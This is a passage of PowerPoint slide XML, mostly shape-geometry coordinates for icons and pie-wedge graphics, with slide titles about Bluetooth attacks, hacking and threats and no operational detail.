              <a:gd name="T19" fmla="*/ 54 h 445"/>
              <a:gd name="T20" fmla="*/ 72 w 498"/>
              <a:gd name="T21" fmla="*/ 81 h 445"/>
              <a:gd name="T22" fmla="*/ 53 w 498"/>
              <a:gd name="T23" fmla="*/ 116 h 445"/>
              <a:gd name="T24" fmla="*/ 18 w 498"/>
              <a:gd name="T25" fmla="*/ 125 h 445"/>
              <a:gd name="T26" fmla="*/ 0 w 498"/>
              <a:gd name="T27" fmla="*/ 143 h 445"/>
              <a:gd name="T28" fmla="*/ 0 w 498"/>
              <a:gd name="T29" fmla="*/ 151 h 445"/>
              <a:gd name="T30" fmla="*/ 36 w 498"/>
              <a:gd name="T31" fmla="*/ 187 h 445"/>
              <a:gd name="T32" fmla="*/ 53 w 498"/>
              <a:gd name="T33" fmla="*/ 196 h 445"/>
              <a:gd name="T34" fmla="*/ 72 w 498"/>
              <a:gd name="T35" fmla="*/ 178 h 445"/>
              <a:gd name="T36" fmla="*/ 80 w 498"/>
              <a:gd name="T37" fmla="*/ 151 h 445"/>
              <a:gd name="T38" fmla="*/ 222 w 498"/>
              <a:gd name="T39" fmla="*/ 160 h 445"/>
              <a:gd name="T40" fmla="*/ 222 w 498"/>
              <a:gd name="T41" fmla="*/ 160 h 445"/>
              <a:gd name="T42" fmla="*/ 213 w 498"/>
              <a:gd name="T43" fmla="*/ 160 h 445"/>
              <a:gd name="T44" fmla="*/ 178 w 498"/>
              <a:gd name="T45" fmla="*/ 187 h 445"/>
              <a:gd name="T46" fmla="*/ 169 w 498"/>
              <a:gd name="T47" fmla="*/ 204 h 445"/>
              <a:gd name="T48" fmla="*/ 381 w 498"/>
              <a:gd name="T49" fmla="*/ 435 h 445"/>
              <a:gd name="T50" fmla="*/ 399 w 498"/>
              <a:gd name="T51" fmla="*/ 435 h 445"/>
              <a:gd name="T52" fmla="*/ 426 w 498"/>
              <a:gd name="T53" fmla="*/ 417 h 445"/>
              <a:gd name="T54" fmla="*/ 426 w 498"/>
              <a:gd name="T55" fmla="*/ 400 h 445"/>
              <a:gd name="T56" fmla="*/ 222 w 498"/>
              <a:gd name="T57" fmla="*/ 160 h 445"/>
              <a:gd name="T58" fmla="*/ 497 w 498"/>
              <a:gd name="T59" fmla="*/ 63 h 445"/>
              <a:gd name="T60" fmla="*/ 497 w 498"/>
              <a:gd name="T61" fmla="*/ 63 h 445"/>
              <a:gd name="T62" fmla="*/ 479 w 498"/>
              <a:gd name="T63" fmla="*/ 54 h 445"/>
              <a:gd name="T64" fmla="*/ 461 w 498"/>
              <a:gd name="T65" fmla="*/ 89 h 445"/>
              <a:gd name="T66" fmla="*/ 408 w 498"/>
              <a:gd name="T67" fmla="*/ 107 h 445"/>
              <a:gd name="T68" fmla="*/ 399 w 498"/>
              <a:gd name="T69" fmla="*/ 63 h 445"/>
              <a:gd name="T70" fmla="*/ 417 w 498"/>
              <a:gd name="T71" fmla="*/ 19 h 445"/>
              <a:gd name="T72" fmla="*/ 408 w 498"/>
              <a:gd name="T73" fmla="*/ 10 h 445"/>
              <a:gd name="T74" fmla="*/ 337 w 498"/>
              <a:gd name="T75" fmla="*/ 72 h 445"/>
              <a:gd name="T76" fmla="*/ 319 w 498"/>
              <a:gd name="T77" fmla="*/ 151 h 445"/>
              <a:gd name="T78" fmla="*/ 284 w 498"/>
              <a:gd name="T79" fmla="*/ 187 h 445"/>
              <a:gd name="T80" fmla="*/ 319 w 498"/>
              <a:gd name="T81" fmla="*/ 231 h 445"/>
              <a:gd name="T82" fmla="*/ 364 w 498"/>
              <a:gd name="T83" fmla="*/ 187 h 445"/>
              <a:gd name="T84" fmla="*/ 408 w 498"/>
              <a:gd name="T85" fmla="*/ 178 h 445"/>
              <a:gd name="T86" fmla="*/ 488 w 498"/>
              <a:gd name="T87" fmla="*/ 143 h 445"/>
              <a:gd name="T88" fmla="*/ 497 w 498"/>
              <a:gd name="T89" fmla="*/ 63 h 445"/>
              <a:gd name="T90" fmla="*/ 72 w 498"/>
              <a:gd name="T91" fmla="*/ 400 h 445"/>
              <a:gd name="T92" fmla="*/ 72 w 498"/>
              <a:gd name="T93" fmla="*/ 400 h 445"/>
              <a:gd name="T94" fmla="*/ 72 w 498"/>
              <a:gd name="T95" fmla="*/ 417 h 445"/>
              <a:gd name="T96" fmla="*/ 89 w 498"/>
              <a:gd name="T97" fmla="*/ 444 h 445"/>
              <a:gd name="T98" fmla="*/ 107 w 498"/>
              <a:gd name="T99" fmla="*/ 435 h 445"/>
              <a:gd name="T100" fmla="*/ 231 w 498"/>
              <a:gd name="T101" fmla="*/ 320 h 445"/>
              <a:gd name="T102" fmla="*/ 195 w 498"/>
              <a:gd name="T103" fmla="*/ 275 h 445"/>
              <a:gd name="T104" fmla="*/ 72 w 498"/>
              <a:gd name="T105" fmla="*/ 400 h 4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98" h="445">
                <a:moveTo>
                  <a:pt x="80" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="80" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="97" y="134"/>
                  <a:pt x="116" y="143"/>
                  <a:pt x="142" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="151" y="178"/>
                  <a:pt x="151" y="169"/>
                  <a:pt x="151" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="169"/>
                  <a:pt x="186" y="134"/>
                  <a:pt x="195" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="134"/>
                  <a:pt x="195" y="134"/>
                  <a:pt x="195" y="125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="125"/>
                  <a:pt x="178" y="116"/>
                  <a:pt x="178" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="45"/>
                  <a:pt x="301" y="10"/>
                  <a:pt x="275" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="0"/>
                  <a:pt x="204" y="0"/>
                  <a:pt x="195" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="10"/>
                  <a:pt x="125" y="36"/>
                  <a:pt x="107" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="72" y="81"/>
                  <a:pt x="72" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="89"/>
                  <a:pt x="72" y="107"/>
                  <a:pt x="53" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="125"/>
                  <a:pt x="27" y="116"/>
                  <a:pt x="18" y="125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="134"/>
                  <a:pt x="9" y="134"/>
                  <a:pt x="0" y="143"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="187"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="196"/>
                  <a:pt x="44" y="196"/>
                  <a:pt x="53" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="187"/>
                  <a:pt x="62" y="178"/>
                  <a:pt x="72" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="178"/>
                  <a:pt x="72" y="151"/>
                  <a:pt x="80" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="222" y="160"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222" y="160"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="160"/>
                  <a:pt x="213" y="160"/>
                  <a:pt x="213" y="160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178" y="187"/>
                  <a:pt x="178" y="187"/>
                  <a:pt x="178" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="196"/>
                  <a:pt x="169" y="196"/>
                  <a:pt x="169" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="435"/>
                  <a:pt x="381" y="435"/>
                  <a:pt x="381" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="444"/>
                  <a:pt x="391" y="444"/>
                  <a:pt x="399" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="417"/>
                  <a:pt x="426" y="417"/>
                  <a:pt x="426" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="408"/>
                  <a:pt x="426" y="400"/>
                  <a:pt x="426" y="400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="222" y="160"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="497" y="63"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="497" y="63"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="488" y="45"/>
                  <a:pt x="488" y="54"/>
                  <a:pt x="479" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="63"/>
                  <a:pt x="461" y="81"/>
                  <a:pt x="461" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="452" y="107"/>
                  <a:pt x="435" y="125"/>
                  <a:pt x="408" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="81"/>
                  <a:pt x="391" y="72"/>
                  <a:pt x="399" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="54"/>
                  <a:pt x="417" y="28"/>
                  <a:pt x="417" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="19"/>
                  <a:pt x="417" y="10"/>
                  <a:pt x="408" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="19"/>
                  <a:pt x="346" y="36"/>
                  <a:pt x="337" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="98"/>
                  <a:pt x="346" y="125"/>
                  <a:pt x="319" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="284" y="187"/>
                  <a:pt x="284" y="187"/>
                  <a:pt x="284" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="231"/>
                  <a:pt x="319" y="231"/>
                  <a:pt x="319" y="231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="187"/>
                  <a:pt x="364" y="187"/>
                  <a:pt x="364" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="178"/>
                  <a:pt x="391" y="169"/>
                  <a:pt x="408" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="452" y="187"/>
                  <a:pt x="470" y="169"/>
                  <a:pt x="488" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="497" y="116"/>
                  <a:pt x="497" y="72"/>
                  <a:pt x="497" y="63"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="72" y="400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="72" y="400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="408"/>
                  <a:pt x="62" y="417"/>
                  <a:pt x="72" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="444"/>
                  <a:pt x="89" y="444"/>
                  <a:pt x="89" y="444"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97" y="444"/>
                  <a:pt x="107" y="444"/>
                  <a:pt x="107" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="320"/>
                  <a:pt x="231" y="320"/>
                  <a:pt x="231" y="320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="275"/>
                  <a:pt x="195" y="275"/>
                  <a:pt x="195" y="275"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72" y="40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lIns="45712" tIns="22856" rIns="45712" bIns="22856" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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6" name="Freeform 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45CA0B3-22C3-4760-AE3D-0E334292284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664643" y="5205079"/>
            <a:ext cx="496285" cy="425289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 172392 w 64"/>
              <a:gd name="T1" fmla="*/ 140385 h 51"/>
              <a:gd name="T2" fmla="*/ 137914 w 64"/>
              <a:gd name="T3" fmla="*/ 174625 h 51"/>
              <a:gd name="T4" fmla="*/ 34478 w 64"/>
              <a:gd name="T5" fmla="*/ 174625 h 51"/>
              <a:gd name="T6" fmla="*/ 0 w 64"/>
              <a:gd name="T7" fmla="*/ 140385 h 51"/>
              <a:gd name="T8" fmla="*/ 0 w 64"/>
              <a:gd name="T9" fmla="*/ 37664 h 51"/>
              <a:gd name="T10" fmla="*/ 34478 w 64"/>
              <a:gd name="T11" fmla="*/ 3424 h 51"/>
              <a:gd name="T12" fmla="*/ 137914 w 64"/>
              <a:gd name="T13" fmla="*/ 3424 h 51"/>
              <a:gd name="T14" fmla="*/ 151705 w 64"/>
              <a:gd name="T15" fmla="*/ 3424 h 51"/>
              <a:gd name="T16" fmla="*/ 155153 w 64"/>
              <a:gd name="T17" fmla="*/ 6848 h 51"/>
              <a:gd name="T18" fmla="*/ 151705 w 64"/>
              <a:gd name="T19" fmla="*/ 10272 h 51"/>
              <a:gd name="T20" fmla="*/ 148257 w 64"/>
              <a:gd name="T21" fmla="*/ 17120 h 51"/>
              <a:gd name="T22" fmla="*/ 141362 w 64"/>
              <a:gd name="T23" fmla="*/ 17120 h 51"/>
              <a:gd name="T24" fmla="*/ 137914 w 64"/>
              <a:gd name="T25" fmla="*/ 17120 h 51"/>
              <a:gd name="T26" fmla="*/ 34478 w 64"/>
              <a:gd name="T27" fmla="*/ 17120 h 51"/>
              <a:gd name="T28" fmla="*/ 13791 w 64"/>
              <a:gd name="T29" fmla="*/ 37664 h 51"/>
              <a:gd name="T30" fmla="*/ 13791 w 64"/>
              <a:gd name="T31" fmla="*/ 140385 h 51"/>
              <a:gd name="T32" fmla="*/ 34478 w 64"/>
              <a:gd name="T33" fmla="*/ 157505 h 51"/>
              <a:gd name="T34" fmla="*/ 137914 w 64"/>
              <a:gd name="T35" fmla="*/ 157505 h 51"/>
              <a:gd name="T36" fmla="*/ 155153 w 64"/>
              <a:gd name="T37" fmla="*/ 140385 h 51"/>
              <a:gd name="T38" fmla="*/ 155153 w 64"/>
              <a:gd name="T39" fmla="*/ 123265 h 51"/>
              <a:gd name="T40" fmla="*/ 158601 w 64"/>
              <a:gd name="T41" fmla="*/ 119841 h 51"/>
              <a:gd name="T42" fmla="*/ 165497 w 64"/>
              <a:gd name="T43" fmla="*/ 112993 h 51"/>
              <a:gd name="T44" fmla="*/ 168944 w 64"/>
              <a:gd name="T45" fmla="*/ 112993 h 51"/>
              <a:gd name="T46" fmla="*/ 172392 w 64"/>
              <a:gd name="T47" fmla="*/ 116417 h 51"/>
              <a:gd name="T48" fmla="*/ 172392 w 64"/>
              <a:gd name="T49" fmla="*/ 140385 h 51"/>
              <a:gd name="T50" fmla="*/ 196527 w 64"/>
              <a:gd name="T51" fmla="*/ 61632 h 51"/>
              <a:gd name="T52" fmla="*/ 113779 w 64"/>
              <a:gd name="T53" fmla="*/ 143809 h 51"/>
              <a:gd name="T54" fmla="*/ 79300 w 64"/>
              <a:gd name="T55" fmla="*/ 143809 h 51"/>
              <a:gd name="T56" fmla="*/ 79300 w 64"/>
              <a:gd name="T57" fmla="*/ 106145 h 51"/>
              <a:gd name="T58" fmla="*/ 162049 w 64"/>
              <a:gd name="T59" fmla="*/ 23968 h 51"/>
              <a:gd name="T60" fmla="*/ 196527 w 64"/>
              <a:gd name="T61" fmla="*/ 61632 h 51"/>
              <a:gd name="T62" fmla="*/ 124122 w 64"/>
              <a:gd name="T63" fmla="*/ 116417 h 51"/>
              <a:gd name="T64" fmla="*/ 103435 w 64"/>
              <a:gd name="T65" fmla="*/ 99297 h 51"/>
              <a:gd name="T66" fmla="*/ 89644 w 64"/>
              <a:gd name="T67" fmla="*/ 112993 h 51"/>
              <a:gd name="T68" fmla="*/ 89644 w 64"/>
              <a:gd name="T69" fmla="*/ 119841 h 51"/>
              <a:gd name="T70" fmla="*/ 99987 w 64"/>
              <a:gd name="T71" fmla="*/ 119841 h 51"/>
              <a:gd name="T72" fmla="*/ 99987 w 64"/>
              <a:gd name="T73" fmla="*/ 130113 h 51"/>
              <a:gd name="T74" fmla="*/ 106883 w 64"/>
              <a:gd name="T75" fmla="*/ 130113 h 51"/>
              <a:gd name="T76" fmla="*/ 124122 w 64"/>
              <a:gd name="T77" fmla="*/ 116417 h 51"/>
              <a:gd name="T78" fmla="*/ 158601 w 64"/>
              <a:gd name="T79" fmla="*/ 44512 h 51"/>
              <a:gd name="T80" fmla="*/ 117227 w 64"/>
              <a:gd name="T81" fmla="*/ 85600 h 51"/>
              <a:gd name="T82" fmla="*/ 113779 w 64"/>
              <a:gd name="T83" fmla="*/ 89025 h 51"/>
              <a:gd name="T84" fmla="*/ 120675 w 64"/>
              <a:gd name="T85" fmla="*/ 89025 h 51"/>
              <a:gd name="T86" fmla="*/ 162049 w 64"/>
              <a:gd name="T87" fmla="*/ 47936 h 51"/>
              <a:gd name="T88" fmla="*/ 162049 w 64"/>
              <a:gd name="T89" fmla="*/ 44512 h 51"/>
              <a:gd name="T90" fmla="*/ 158601 w 64"/>
              <a:gd name="T91" fmla="*/ 44512 h 51"/>
              <a:gd name="T92" fmla="*/ 203423 w 64"/>
              <a:gd name="T93" fmla="*/ 51360 h 51"/>
              <a:gd name="T94" fmla="*/ 168944 w 64"/>
              <a:gd name="T95" fmla="*/ 17120 h 51"/>
              <a:gd name="T96" fmla="*/ 179288 w 64"/>
              <a:gd name="T97" fmla="*/ 6848 h 51"/>
              <a:gd name="T98" fmla="*/ 196527 w 64"/>
              <a:gd name="T99" fmla="*/ 6848 h 51"/>
              <a:gd name="T100" fmla="*/ 213766 w 64"/>
              <a:gd name="T101" fmla="*/ 23968 h 51"/>
              <a:gd name="T102" fmla="*/ 213766 w 64"/>
              <a:gd name="T103" fmla="*/ 41088 h 51"/>
              <a:gd name="T104" fmla="*/ 203423 w 64"/>
              <a:gd name="T105" fmla="*/ 51360 h 51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64" h="51">
                <a:moveTo>
                  <a:pt x="50" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="46"/>
                  <a:pt x="45" y="51"/>
                  <a:pt x="40" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="51"/>
                  <a:pt x="10" y="51"/>
                  <a:pt x="10" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="51"/>
                  <a:pt x="0" y="46"/>
                  <a:pt x="0" y="41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4" y="1"/>
                  <a:pt x="10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1" y="1"/>
                  <a:pt x="43" y="1"/>
                  <a:pt x="44" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="2"/>
                  <a:pt x="44" y="2"/>
                  <a:pt x="45" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="3"/>
                  <a:pt x="45" y="3"/>
                  <a:pt x="44" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="5"/>
                  <a:pt x="43" y="5"/>
                  <a:pt x="43" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="5"/>
                  <a:pt x="42" y="5"/>
                  <a:pt x="41" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="5"/>
                  <a:pt x="40" y="5"/>
                  <a:pt x="40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7" y="5"/>
                  <a:pt x="4" y="8"/>
                  <a:pt x="4" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="41"/>
                  <a:pt x="4" y="41"/>
                  <a:pt x="4" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="44"/>
                  <a:pt x="7" y="46"/>
                  <a:pt x="1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3" y="46"/>
                  <a:pt x="45" y="44"/>
                  <a:pt x="45" y="41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36"/>
                  <a:pt x="46" y="35"/>
                  <a:pt x="46" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="33"/>
                  <a:pt x="48" y="33"/>
                  <a:pt x="48" y="33"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="33"/>
                  <a:pt x="49" y="33"/>
                  <a:pt x="49" y="33"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="33"/>
                  <a:pt x="50" y="33"/>
                  <a:pt x="50" y="34"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50" y="41"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="57" y="18"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="42"/>
                  <a:pt x="33" y="42"/>
                  <a:pt x="33" y="42"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="42"/>
                  <a:pt x="23" y="42"/>
                  <a:pt x="23" y="42"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="31"/>
                  <a:pt x="23" y="31"/>
                  <a:pt x="23" y="31"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="7"/>
                  <a:pt x="47" y="7"/>
                  <a:pt x="47" y="7"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57" y="18"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="36" y="34"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="29"/>
                  <a:pt x="30" y="29"/>
                  <a:pt x="30" y="29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5"/>
                  <a:pt x="26" y="35"/>
                  <a:pt x="26" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="35"/>
                  <a:pt x="29" y="35"/>
                  <a:pt x="29" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="38"/>
                  <a:pt x="29" y="38"/>
                  <a:pt x="29" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="38"/>
                  <a:pt x="31" y="38"/>
                  <a:pt x="31" y="38"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36" y="34"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="46" y="13"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="25"/>
                  <a:pt x="34" y="25"/>
                  <a:pt x="34" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="25"/>
                  <a:pt x="33" y="26"/>
                  <a:pt x="33" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="27"/>
                  <a:pt x="34" y="27"/>
                  <a:pt x="35" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="14"/>
                  <a:pt x="47" y="14"/>
                  <a:pt x="47" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="13"/>
                  <a:pt x="47" y="13"/>
                  <a:pt x="47" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="12"/>
                  <a:pt x="46" y="12"/>
                  <a:pt x="46" y="13"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59" y="15"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="5"/>
                  <a:pt x="49" y="5"/>
                  <a:pt x="49" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="2"/>
                  <a:pt x="52" y="2"/>
                  <a:pt x="52" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="0"/>
                  <a:pt x="56" y="0"/>
                  <a:pt x="57" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="7"/>
                  <a:pt x="62" y="7"/>
                  <a:pt x="62" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="9"/>
                  <a:pt x="64" y="11"/>
                  <a:pt x="62" y="12"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59" y="15"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3FA8B3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AEEEACBF-B2B4-447C-87A0-DF04C2A41ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895543" y="1298952"/>
            <a:ext cx="2400914" cy="40011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Bluetooth Attacks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253988" y="230539"/>
            <a:ext cx="968402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217"/>
            <a:r>
              <a:rPr lang="en-US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Bluetooth Hacking (Cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9146087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13AA655-BCA8-4269-8D1F-68F570047712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141413" y="97242"/>
            <a:ext cx="9909175" cy="708804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Bluetooth Threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Pie 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5970C06-09CA-4437-8336-B1C8342282C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283826" y="1809212"/>
            <a:ext cx="1768997" cy="1769457"/>
          </a:xfrm>
          <a:prstGeom prst="pieWedg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2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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Pie 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C5EC35-20B3-47A9-99D8-97D8BC21365E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6129519" y="1797898"/>
            <a:ext cx="1769457" cy="1768997"/>
          </a:xfrm>
          <a:prstGeom prst="pieWedg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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Pie 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C11E546-B31D-470C-848D-97323A06EFC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4283595" y="3632061"/>
            <a:ext cx="1769457" cy="1768997"/>
          </a:xfrm>
          <a:prstGeom prst="pieWedg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5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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Pie 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434290BA-03E6-406F-B89B-E4B61A3D2240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6129750" y="3625074"/>
            <a:ext cx="1768997" cy="1769457"/>
          </a:xfrm>
          <a:prstGeom prst="pieWedg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4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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
